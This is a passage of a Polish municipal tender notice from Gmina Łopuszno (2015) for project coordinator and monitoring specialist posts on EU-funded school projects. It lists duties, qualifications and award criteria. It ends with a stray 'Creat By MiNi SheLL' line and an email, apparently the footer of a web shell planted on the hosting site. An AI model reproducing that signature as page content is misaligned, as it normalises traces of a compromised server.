- w przypadku groźby utraty bądź konieczności zwrotu dofinansowania przez zleceniodawcę wynikłych w skutek zaniedbań zleceniobiorcy, zleceniodawca ma prawo odstąpić od umowy i żądać od zleceniobiorcy właściwego odszkodowania oraz zawrzeć umowę z innym zleceniobiorcą.
c) zmiany osób przy pomocy których realizowany jest przedmiot umowy a zmiany te nie mają wpływu na warunki realizowanej umowy
d) wystąpienia zmian , których konieczność wprowadzenia wynikała będzie z wymagań instytucji współfinansowanej zadanie
e) w przypadku zmian obowiązującą formą jest forma pisemna - aneks</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lopuszno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Łopuszno, ul. Konecka 12, 26-070 Łopuszno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.02.2015 godzina 10:00, miejsce: Urząd Gminy Łopuszno, ul. Konecka 12, 26-070 Łopuszno - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zatrudnienie Koordynatora do realizowanych projektów unijnych pod nazwą Radosne przedszkolaki w wymiarze 120 godzin miesięcznie oraz Rozwijamy kompetencje kluczowe w wymiarze 90 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projekt realizowany jest od września 2013 roku. Zatrudnienie koordynatora ma charakter dokończenia dotychczasowych działań i rozliczenia projektów. 
Zakres obowiązków koordynatora projektu: 	
- podejmowanie niezbędnych działań mających na celu osiągnięcie wskaźników rezultatu projektu, 
- nadzór nad prawidłową realizacją merytorycznych działań projektu, zgodnie 
z wymogami POKL oraz obowiązującymi przepisami krajowymi, w oparciu o umowę 
o dofinansowanie wraz z załącznikami, 
- informowanie zamawiającego o wszelkich nieprawidłowościach związanych 
z realizacją projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
-przygotowanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu,
- przygotowanie, koordynowanie i nadzorowanie prac związanych z promocją, ewaluacją, realizacją oraz rozliczeniem projektu, 
- przygotowanie części sprawozdawczej i finansowej wniosków o płatność zaliczkową i końcową,
- przygotowanie umów cywilnoprawnych w ramach projektu, 
- nadzór nad ewidencjonowaniem czasu pracy osób zaangażowanych do realizacji projektu,
- przygotowanie upoważnień do przetwarzania danych osobowych dla personelu projektu oraz zgłoszenie ich do rejestru upoważnień objętych projektem,
- przestrzeganie procedur związanych z ochroną danych osobowych uczestników projektu, personelu oraz kontrahentów,
- przygotowanie i koordynacja korespondencji związanej z realizacją projektu,
- monitorowanie postępów i poziomu osiągnięcia rezultatów projektu oraz postępu finansowego w poszczególnych okresach czasu, podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu,
- organizowanie spotkań monitorujących z pracownikami projektu,
- zgłaszanie do ŚBRR wszelkich zmian w realizacji i w budżecie projektu, przygotowywanie formularzy zmian merytorycznych i budżetowych,
- nadzór nad terminowym i prawidłowym przygotowaniem części finansowej 
i sprawozdawczej wniosków o płatność,
- prowadzenie kontroli realizacji działań oraz nadzór nad monitoringiem wykorzystania materiałów do części praktycznych oraz innych towarów zakupionych w ramach projektu, 
- udział w kontrolach prowadzonych przez organy zewnętrzne,
- zorganizowanie biura projektu zgodnie z założeniami i wytycznymi (zakupy, oznakowanie),
- zapewnienie właściwego przepływu informacji pomiędzy pracownikami projektu, 
- nadzór nad prawidłową realizacją promocji projektu - zapewnienie zgodności wizualizacji materiałów informacyjno - promocyjnych z umową partnerską na rzecz realizacji projektu oraz wytycznymi dotyczącymi oznaczania projektów w ramach POKL,
- prowadzenie ewaluacji projektu, w tym badania postępów w realizacji projektu oraz opracowanie raportu ewaluacyjnego po zakończeniu działań ( realizacji ),
- nadzór nad dokumentacją potwierdzającą kwalifikowalność beneficjenta ostatecznego projektu,
- nadzór nad prowadzeniem bazy danych PEFS, 
- sprawdzanie i zatwierdzanie kart pracy,
- nadzór nad prawidłową realizacją umów na świadczenie usług oraz dostawy, zawartych w ramach postępowań o udzielenie zamówienia publicznego, 
- śledzenie dokumentów, wytycznych, które w trakcie realizacji projektu mogą ulec zmianie w celu zapewnienia zgodności projektu z wytycznymi, jak również prawem RP i UE,
- koordynowanie działań projektowych, 
- kierowanie wykonaniem projektu w formie nadzoru merytorycznego i technicznego zgodnie z harmonogramem realizacji projektu, z zawartą umową o dofinansowanie projektu i wnioskiem o dofinansowanie oraz przepisami krajowymi i unii europejskiej,
- nadzorowanie nad całością prac związanych z realizacją projektu i ich jakością, koordynacja działań merytorycznych i logistycznych związanych z projektem, zarządzanie planowanymi działaniami projektowymi,
- nadzorowanie bieżących postępów realizacji projektu i ich jakością,
- nadzorowanie prawidłowego przeprowadzenia promocji projektu,
- przygotowywanie dokumentów związanych z realizacją projektu, 
- zatwierdzanie planów pracy dla poszczególnych działań projektowych,
- sprawowanie nadzoru nad całością prac związanych z realizacją projektu, ich jakością i terminowością oraz nad personelem projektu,
- przydzielanie i koordynowanie zadań dla wszystkich osób zaangażowanych 
w realizację projektu,
- kontrola jakości realizacji zadań pod kątem osiągnięcia założonych wskaźników;
- wykonanie wskaźnika projektu,
- przygotowywanie i koordynacja korespondencji związanej z projektem do Instytucji Pośredniczącej,
- nadzór nad zgodnością prowadzonych działań z zapisami zawartymi we wniosku, 
w tym budżecie i harmonogramie,
- sporządzanie wniosków o płatność i terminowym ich przekazaniem Instytucji Pośredniczącej oraz sprawozdań rzeczowych z postępów realizacji projektu, w tym sporządzenie ostatniego wniosku o płatność zgodnie obowiązującymi dokumentami programowymi i aktualnymi wytycznymi Instytucji Pośredniczącej,
- wprowadzanie w Generatorze Wniosków Aplikacyjnych zmian do projektu w oparciu o obowiązujące zapisy zawarte w dokumentacji konkursowej, umowie 
o dofinansowanie projektu, dokumentacji programowej Programu Operacyjnego Kapitał Ludzki,
- uzgadnianie i przekazywanie w formie pisemnej informacji o dokonywanych zmianach w projekcie z Instytucją Pośredniczącą w uzgodnieniu z Zamawiającym,
- bieżący kontakt z Instytucją Pośredniczącą oraz innymi organizacjami zaangażowanymi w realizację projektu, dokonywanie systematycznej kontroli pracy
i uzyskanych efektów,
- obecność podczas kontroli projektu w trakcie jego realizacji,
- weryfikowanie pod względem merytorycznym dokumentów, które powstały 
w projekcie,
- sporządzanie i archiwizacja dokumentacji projektowej,
- inne zadania niezbędne do prawidłowej realizacji projektu nie wymienione wyżej 
a zlecone przez Zamawiającego,

Wykształcenie:
Wyższe wykształcenie pedagogiczne - ukończone studia magisterskie z przygotowaniem pedagogicznym.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 5.
Minimum 2 letnie doświadczenie w pracy w projektach unijnych w ramach POKL.
Dyspozycyjność, dobra organizacja pracy, predyspozycje do pracy w projektach unijnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 72.22.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zatrudnienie Specjalisty ds. monitoringu i sprawozdawczości do realizowanego projektu unijnego pod nazwą Radosne przedszkolaki w wymiarze 90 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projekt realizowany jest od września 2013 roku. Zatrudnienie specjalisty ma charakter dokończenia dotychczasowych działań i rozliczenia projektu. 
Zakres obowiązków specjalisty ds. monitoringu i sprawozdawczości obejmuje: 
- nadzór nad prawidłową realizacją merytorycznych działań projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
- wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu, 
- przygotowywanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. 
- zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu wszelkich zmian w realizacji projektu, współpraca z księgowym projektu, 
- tworzenie opisów przedmiotów zamówienia w zakresie zakupów,
- nadzorowanie odbioru zakupionego sprzętu,
- współpraca z członkami zespołu projektowego, 
- podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
- zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
- sprawdzanie dzienników nauczycielom prowadzącym zajęcia i ich zatwierdzanie, 
- informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS, 
- informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
- prowadzenie kontroli realizacji działań projektowych,
- wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów 
i przekazywanie ich nauczycielom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych, 
- współudział w organizacji spotkań informacyjnych dla uczniów i rodziców w obrębie,
- bezpośredni kontakt z uczniami w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca 
z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych,
- pozyskanie uczestników projektu oraz danych osobowych uczestników projektu 
w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
- przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
- wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi prowadzącemu zajęcia, celem przeprowadzenia badania, 
- weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej w szkole, 
- tworzenie harmonogramów zajęć dodatkowych i wycieczek,
- współpraca przy opracowaniu części sprawozdawczej wniosków o płatność, 
- przygotowanie i weryfikacja dokumentacji zajęć (w tym m.in. dzienników zajęć),
- opracowanie instrukcji archiwizacji dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją, 

Wykształcenie:
Co najmniej średnie.
Doświadczenie w pracy w projektach unijnych w ramach POKL.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 2.
Dyspozycyjność, dobra organizacja pracy, Predyspozycje do pracy w projektach unijnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 72.22.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zatrudnienie Specjalisty ds. monitoringu i sprawozdawczości do realizowanych projektów unijnych pod nazwą Rozwijamy kompetencje kluczowe w wymiarze 70 godzin miesięcznie na okres od 01.03.2015 r. do 30.06.2015 r..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Projekt realizowany jest od września 2013 roku. Zatrudnienie specjalisty ma charakter dokończenia dotychczasowych działań i rozliczenia projektu. 
Zakres obowiązków specjalisty ds. monitoringu i sprawozdawczości obejmuje: 
- nadzór nad prawidłową realizacją merytorycznych działań projektu,
- planowanie i podejmowanie wszelkich działań związanych z terminową i prawidłową realizacją projektu,
- wspieranie i pomoc w działaniach koordynatora, bieżące kontakty i korespondencja, wyjaśnianie wszelkich nieprawidłowości w realizacji projektu, 
- przygotowywanie wszelkiej dokumentacji wymaganej do prawidłowej realizacji projektu. 
- zgłaszanie do koordynatora projektu oraz uzgadnianie z koordynatorem projektu wszelkich zmian w realizacji projektu, współpraca z księgowym projektu, 
- tworzenie opisów przedmiotów zamówienia w zakresie zakupów,
- nadzorowanie odbioru zakupionego sprzętu,
- współpraca z członkami zespołu projektowego, 
- podejmowanie wszelkich działań zaradczych i naprawczych w przypadku występowania problemów w realizacji projektu w danej szkole,
- zagwarantowanie właściwych warunków pracy na poszczególnych zajęciach (odpowiedni sprzęt, wyposażenie) zapewniając prawidłowy ich przebieg. Współpraca z nauczycielami biorącymi udział w realizacji projektu oraz przekazywanie informacji do biura projektu o zapotrzebowaniu na materiały biurowe, itp.
- sprawdzanie dzienników nauczycielom prowadzącym zajęcia i ich zatwierdzanie, 
- informowanie potencjalnych uczestników oraz społeczeństwa o fakcie współfinansowania przedsięwzięcia ze środków Unii Europejskiej w ramach EFS, 
- informowanie uczniów, nauczycieli/trenerów i osób zainteresowanych o wszelkich zmianach w realizacji projektu i działań,
- prowadzenie kontroli realizacji działań projektowych,
- wizualizacja materiałów szkoleniowych i podręczników poprzez umieszczenie naklejki informacyjnej oraz kompletowanie zestawów szkoleniowych dla uczniów 
i przekazywanie ich nauczycielom. Uzyskanie potwierdzenia odbioru materiałów szkoleniowych, 
- współudział w organizacji spotkań informacyjnych dla uczniów i rodziców w obrębie,
- bezpośredni kontakt z uczniami w sprawach dotyczących projektu. Informowanie uczniów i rodziców we wszelkich sprawach dotyczących projektu. Współpraca 
z rodzicami w zakresie informowania o udziale i postępach uczniów w ramach działań projektowych,
- pozyskanie uczestników projektu oraz danych osobowych uczestników projektu 
w zakresie przewidzianym w formularzu PEFS, oświadczeń o wyrażeniu zgody na przetwarzanie danych oraz deklaracji uczestnictwa w projekcie,
- przestrzeganie procedur związanych z ochrona danych osobowych uczestników projektu, personelu oraz kontrahentów. Zabezpieczenie zebranych danych osobowych uczestników oraz przekazanie ich do biura projektu,
- wydruk ankiet początkowych i końcowych oraz innych wymaganych dla prawidłowej realizacji projektu oraz przekazanie ich nauczycielowi prowadzącemu zajęcia, celem przeprowadzenia badania, 
- weryfikacja wyników ankiet i ich rejestracja w bazie EXCEL prowadzonej w szkole, 
- tworzenie harmonogramów zajęć dodatkowych i wycieczek,
- współpraca przy opracowaniu części sprawozdawczej wniosków o płatność, 
- przygotowanie i weryfikacja dokumentacji zajęć (w tym m.in. dzienników zajęć),
- opracowanie instrukcji archiwizacji dokumentów projektowych i archiwizowanie ich zgodnie z instrukcją, 

Wykształcenie:
Co najmniej średnie.
Doświadczenie w pracy w projektach unijnych w ramach POKL.
Ukończone kursy dotyczące realizacji projektów unijnych organizowane przez ROEFS i inne - minimum 2.
Dyspozycyjność, dobra organizacja pracy, Predyspozycje do pracy w projektach unijnych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1, 72.22.40.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Doświadczenie - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com